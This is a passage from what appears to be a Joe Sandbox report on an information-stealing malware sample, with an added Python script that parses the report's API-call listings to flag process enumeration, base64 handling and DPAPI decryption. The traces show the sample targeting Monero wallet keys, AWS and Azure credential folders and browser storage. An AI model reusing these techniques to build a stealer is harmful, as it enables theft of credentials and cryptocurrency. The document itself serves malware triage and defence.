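The records above are the ones a triager keys on: the CreateToolhelp32Snapshot / Process32First / Process32Next walk at 003B3A96 (first argument 00000002 is TH32CS_SNAPPROCESS, so it enumerates processes, which is the behaviour behind the "Searches for specific processes" signature), CryptStringToBinaryA called twice around a LocalAlloc at 00399B3B (the size-query-then-fill pattern; flag 00000001 is CRYPT_STRING_BASE64), CryptBinaryToStringA called twice around RtlAllocateHeap at 003B40CD (flag 40000001 is CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, i.e. single-line base64), and CryptUnprotectData into a LocalAlloc buffer at 00399B9F (DPAPI decryption). The following Python script is an added example, not part of the Joe Sandbox report or of Joe Sandbox itself: it parses "APIs" bullet lines in exactly the format printed above, decodes the crypt32 and Toolhelp32 constants, and flags the ordered call patterns and the two-pass size/fill calls. The signature names and ordering rules are my own, the sample records are copied from this listing, and the regular expression assumes the line layout shown here.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox report.
Added example, not part of the report or of Joe Sandbox; signature names, ordering
rules and the sample records are my own constructions."""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# One bullet line, e.g. "• LocalAlloc.KERNEL32(00000040,00000000), ref: 00399B4A",
# or with no argument list at all: "• LocalFree.KERNEL32 ref: 00399B70".
CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref: (?P<ref>[0-9A-Fa-f]+)")
# wincrypt.h: the low word selects the encoding, the high bits are OR-able modifiers.
CRYPT_STRING_FORMATS = {0x0: "CRYPT_STRING_BASE64HEADER", 0x1: "CRYPT_STRING_BASE64",
                        0x2: "CRYPT_STRING_BINARY", 0x4: "CRYPT_STRING_HEX",
                        0x6: "CRYPT_STRING_BASE64_ANY", 0x7: "CRYPT_STRING_ANY"}
CRYPT_STRING_MODIFIERS = {0x20000000: "CRYPT_STRING_STRICT",
                          0x40000000: "CRYPT_STRING_NOCRLF", 0x80000000: "CRYPT_STRING_NOCR"}
# tlhelp32.h selectors for the first argument of CreateToolhelp32Snapshot.
TH32CS_FLAGS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS",
                0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"}
ALLOCATORS = {"LocalAlloc", "GlobalAlloc", "HeapAlloc", "RtlAllocateHeap", "VirtualAlloc"}
# Ordered call patterns worth flagging in a stealer (names are mine, not Joe Sandbox's).
SIGNATURES = {
    "process enumeration via Toolhelp32 snapshot":
        ("CreateToolhelp32Snapshot", "Process32First", "Process32Next"),
    "DPAPI blob decrypted into a LocalAlloc buffer":
        ("CryptUnprotectData", "LocalAlloc", "LocalFree"),
    "base64 decode with size-query/fill pattern":
        ("CryptStringToBinaryA", "LocalAlloc", "CryptStringToBinaryA"),
    "base64 encode with size-query/fill pattern":
        ("CryptBinaryToStringA", "RtlAllocateHeap", "CryptBinaryToStringA"),
}

class Call(NamedTuple):
    api: str
    module: str
    args: Tuple[str, ...]   # arguments exactly as printed: hex, "?" or a literal
    ref: str                # call-site address
    subcall: Optional[str]  # callee address when the line is "Part of subcall function"

def parse_calls(lines: List[str]) -> List[Call]:
    """Parse the bullet lines of one function record; lines that are not calls are skipped."""
    calls = []
    for line in lines:
        m = CALL_RE.search(line)
        if m:
            raw = m["args"]
            args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
            calls.append(Call(m["api"], m["module"], args, m["ref"].upper(), m["sub"]))
    return calls

def hexarg(call: Call, i: int) -> Optional[int]:
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):         # absent, "?" or a literal such as ERROR
        return None

def decode_crypt_string_flags(value: int) -> str:
    names = [CRYPT_STRING_FORMATS.get(value & 0xFFFF, f"0x{value & 0xFFFF:x}")]
    return "|".join(names + [n for bit, n in CRYPT_STRING_MODIFIERS.items() if value & bit])

def annotate(call: Call) -> Optional[str]:
    """Decode the one constant that matters for this API, or None when there is none."""
    if call.api.startswith(("CryptBinaryToString", "CryptStringToBinary")):
        v = hexarg(call, 2)                  # dwFlags is the third parameter of both
        return None if v is None else decode_crypt_string_flags(v)
    if call.api == "CreateToolhelp32Snapshot":
        v = hexarg(call, 0)
        if v is not None:
            return "|".join(n for bit, n in TH32CS_FLAGS.items() if v & bit) or f"0x{v:x}"
    return None

def contains_in_order(apis: List[str], pattern: Tuple[str, ...]) -> bool:
    it = iter(apis)                          # subsequence match, gaps allowed
    return all(any(a == p for a in it) for p in pattern)

def two_pass_calls(calls: List[Call]) -> List[str]:
    """APIs called once to learn a size and again, after an allocation, to fill the buffer."""
    apis = [c.api for c in calls if c.subcall is None]
    return sorted({a for i, a in enumerate(apis) for j in range(i + 1, len(apis))
                   if apis[j] == a and ALLOCATORS & set(apis[i + 1:j])})

def triage(lines: List[str]) -> Dict[str, object]:
    calls = parse_calls(lines)
    direct = [c.api for c in calls if c.subcall is None]   # subcalls only add noise here
    return {"calls": len(calls),
            "signatures": [n for n, p in SIGNATURES.items() if contains_in_order(direct, p)],
            "two_pass": two_pass_calls(calls),
            "decoded": {f"{c.api}@{c.ref}": annotate(c) for c in calls if annotate(c)}}

# Constructed sample: four records copied from the listing above, keyed by first call site.
SAMPLE_RECORDS = {
    "003B3A96": ["• Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE",
                 "• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003B3A96",
                 "• Process32First.KERNEL32(00000000,00000128), ref: 003B3AA9",
                 "• Process32Next.KERNEL32(00000000,00000128), ref: 003B3ABF"],
    "003B40CD": ["• CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003B40CD",
                 "• RtlAllocateHeap.NTDLL(00000000), ref: 003B40E3",
                 "• CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 003B4113"],
    "00399B3B": ["• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00399B3B",
                 "• LocalAlloc.KERNEL32(00000040,00000000), ref: 00399B4A",
                 "• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00399B61",
                 "• LocalFree.KERNEL32 ref: 00399B70"],
    "00399B9F": ["• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00399B9F",
                 "• LocalAlloc.KERNEL32(00000040,?), ref: 00399BB3",
                 "• LocalFree.KERNEL32(?), ref: 00399BD7"],
}

if __name__ == "__main__":
    for key, lines in SAMPLE_RECORDS.items(): print(key, triage(lines))
```

The ordering check ignores "Part of subcall function" lines on purpose: they belong to the callee, so including them would let string helpers such as lstrcpy break or fake a sequence. A base64 decode helper next to a DPAPI unprotect helper is the usual shape of code that unwraps a DPAPI-protected key, but the report does not name what is being decrypted, so treat that reading as a hypothesis to confirm against the strings and file-access sections rather than as a finding.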
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Zu$\TT;
                                • API String ID: 0-1338121359
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: zf^Z
                                • API String ID: 0-3323650118
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: fRu
                                • API String ID: 0-480668746
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: L~{
                                • API String ID: 0-615811358
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 003A8636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 003A86AA
                                • StrStrA.SHLWAPI(?,00F7F190), ref: 003A86CF
                                • lstrcpyn.KERNEL32(005C93D0,?,00000000), ref: 003A86EE
                                • lstrlen.KERNEL32(?), ref: 003A8701
                                • wsprintfA.USER32 ref: 003A8711
                                • lstrcpy.KERNEL32(?,?), ref: 003A8727
                                • StrStrA.SHLWAPI(?,00F7F1C0), ref: 003A8754
                                • lstrcpy.KERNEL32(?,005C93D0), ref: 003A87B4
                                • StrStrA.SHLWAPI(?,00F7F580), ref: 003A87E1
                                • lstrcpyn.KERNEL32(005C93D0,?,00000000), ref: 003A8800
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391F9F
                                • lstrlen.KERNEL32(00F78C18), ref: 00391FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00391FE3
                                • lstrlen.KERNEL32(003C1794), ref: 00391FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039200E
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00392042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039204D
                                • lstrlen.KERNEL32(003C1794), ref: 00392058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392075
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00392081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003920AC
                                • lstrlen.KERNEL32(?), ref: 003920E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392104
                                • lstrcat.KERNEL32(00000000,?), ref: 00392112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392139
                                • lstrlen.KERNEL32(003C1794), ref: 0039214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039216B
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00392177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003921A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003921D4
                                • lstrlen.KERNEL32(?), ref: 003921EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039220A
                                • lstrcat.KERNEL32(00000000,?), ref: 00392218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392242
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039227F
                                • lstrlen.KERNEL32(00F7DD38), ref: 0039228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003922B1
                                • lstrcat.KERNEL32(00000000,00F7DD38), ref: 003922B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003922F7
                                • lstrcat.KERNEL32(00000000), ref: 00392304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00392356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003923BF
                                • DeleteFileA.KERNEL32(00000000), ref: 003923F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00392444
                                • FindClose.KERNEL32(00000000), ref: 00392453
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6445
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003A64AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A64E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6537
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A43A3
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A43D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A43FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A4409
                                • lstrlen.KERNEL32(\storage\default\), ref: 003A4414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 003A443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A4471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4498
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A44D7
                                • lstrcat.KERNEL32(00000000,?), ref: 003A44DF
                                • lstrlen.KERNEL32(003C1794), ref: 003A44EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4507
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A4513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 003A451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 003A4547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A45A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 003A45A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4601
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4653
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A467B
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A46AF
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A57D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003A5804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A5868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A58C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A58D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A58F8
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A5961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5988
                                • lstrlen.KERNEL32(003C1794), ref: 003A599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A59B9
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A59C5
                                • lstrlen.KERNEL32(00F7DDB0), ref: 003A59D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A59F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A5A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 003A5A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A5AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A5B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A5B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A5B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5BB5
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A5BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A5C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5C70
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                APIs
                                  • Part of subcall function 00391120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00391135
                                  • Part of subcall function 00391120: RtlAllocateHeap.NTDLL(00000000), ref: 0039113C
                                  • Part of subcall function 00391120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00391159
                                  • Part of subcall function 00391120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00391173
                                  • Part of subcall function 00391120: RegCloseKey.ADVAPI32(?), ref: 0039117D
                                • lstrcat.KERNEL32(?,00000000), ref: 003911C0
                                • lstrlen.KERNEL32(?), ref: 003911CD
                                • lstrcat.KERNEL32(?,.keys), ref: 003911E8
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039121F
                                • lstrlen.KERNEL32(00F78C18), ref: 0039122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391251
                                • lstrcat.KERNEL32(00000000,00F78C18), ref: 00391259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00391264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00391294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003912BA
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003912FF
                                • lstrlen.KERNEL32(00F7DD38), ref: 0039130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391335
                                • lstrcat.KERNEL32(00000000,?), ref: 0039133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391378
                                • lstrcat.KERNEL32(00000000), ref: 00391385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003913AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 003913D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391401
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039143D
                                  • Part of subcall function 003AEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003AEE12
                                • DeleteFileA.KERNEL32(?), ref: 00391471
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                APIs
                                • memset.MSVCRT ref: 003AE740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003AE769
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE79F
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 003AE7C6
                                • memset.MSVCRT ref: 003AE805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003AE82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE85F
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 003AE886
                                • memset.MSVCRT ref: 003AE8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003AE8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE920
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003AE947
                                • memset.MSVCRT ref: 003AE986
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                APIs
                                • lstrcpy.KERNEL32 ref: 003AABCF
                                • lstrlen.KERNEL32(00F7F3A0), ref: 003AABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003AAC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003AAC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AACB7
                                • lstrlen.KERNEL32(003C4AD4), ref: 003AACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AACF3
                                • lstrcat.KERNEL32(00000000,003C4AD4), ref: 003AACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD28
                                • lstrlen.KERNEL32(003C4AD4), ref: 003AAD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD5C
                                • lstrcat.KERNEL32(00000000,003C4AD4), ref: 003AAD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD91
                                • lstrlen.KERNEL32(00F7F220), ref: 003AADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003AADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AAE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003AAE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAE6F
                                • lstrlen.KERNEL32(00000000), ref: 003AAE85
                                • lstrcpy.KERNEL32(00000000,00F7F328), ref: 003AAEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: 44dbc7a47298a27208794b1629e9a1afe34956670de13471de83a62526a789ed
                                • Instruction ID: d12f6d8eb35d6a7a52bcf8ef07eedfc332e5740e25a75919863dd6878636e8ae
                                • Opcode Fuzzy Hash: 44dbc7a47298a27208794b1629e9a1afe34956670de13471de83a62526a789ed
                                • Instruction Fuzzy Hash: 33B15832912E16AFCB23EB68DC49AAFB7B9FF51301F060424A815EB251DB34DD15CB91
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,003A72A4), ref: 003B47E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 003B47FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 003B480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 003B481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 003B482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 003B4840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 003B4851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 003B4862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 003B4873
